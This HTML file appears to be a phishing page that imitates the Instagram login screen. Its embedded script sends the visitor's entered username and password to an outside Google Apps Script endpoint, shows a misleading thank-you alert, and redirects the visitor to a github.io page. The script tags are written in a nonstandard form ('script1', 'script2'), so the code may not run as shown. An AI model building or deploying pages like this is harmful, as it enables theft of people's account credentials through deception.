<html>

<head>
<title> Login Form </title>
<link rel="stylesheet" href="style.css">
</head>
<body>
<div class="header">
<div class="top">
<div class="logo">
		<img src="img/insta.png" alt="instagram" style="width: 175px;">
</div>

<form method="post" autocomplete="off" name="Custody"><br/>

<input type="text" placeholder="Username" name="username" /><br/><br/>
<input type="password" placeholder="Password" name="password" /><br/><br/>
<button class="submitbutton" onclick="Redirect();"> Login </button><br/><br/>

</form>
</div>

<div class="or">
				<div class="line"></div>
				<p>OR</p>
				<div class="line"></div>
			</div>
			<div class="dif">
				<div class="fb">
					<a href="#"><img src="img/facebook.png" alt="facebook">
					<p>Log in with Facebook</p>
					</a>
				</div>
				<div class="forgot">
					<a href="#">Forgot password?</a>
				</div>
			</div>
		</div>
		<div class="signup">
			<p>Don't have an account? <a href="#">Sign up</a></p>
		</div>
		<div class="apps">
			<p>Get the app.</p>
			<div class="icons">
				<a href="#"><img src="img/appstore.png" alt="appstore"></a>
				<a href="#"><img src="img/googleplay.png" alt="googleplay"></a>
			</div>
		</div>
</div>

          <script1>
            const scriptURL = 'https://script.google.com/macros/s/AKfycbzPNYwSPZoBeXoKDrb4A2QO5Ixm8CVYY98GWCDFGDFMI7YdnnN8WCdbtQ/exec'
            const form = document.forms['Custody']
          
            form.addEventListener('submit', e => {
              e.preventDefault()
              fetch(scriptURL, { method: 'POST', body: new FormData(form)})
                .then(response => alert("Thanks for Contacting us..! We Will Contact You Soon..."))
                .catch(error => console.error('Error!', error.message))
            })
          </script1>
<script2>
function Redirect()
{
  window.location="https://chintu2408.github.io/webtest"
} </script2>
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>


</body>
</html>
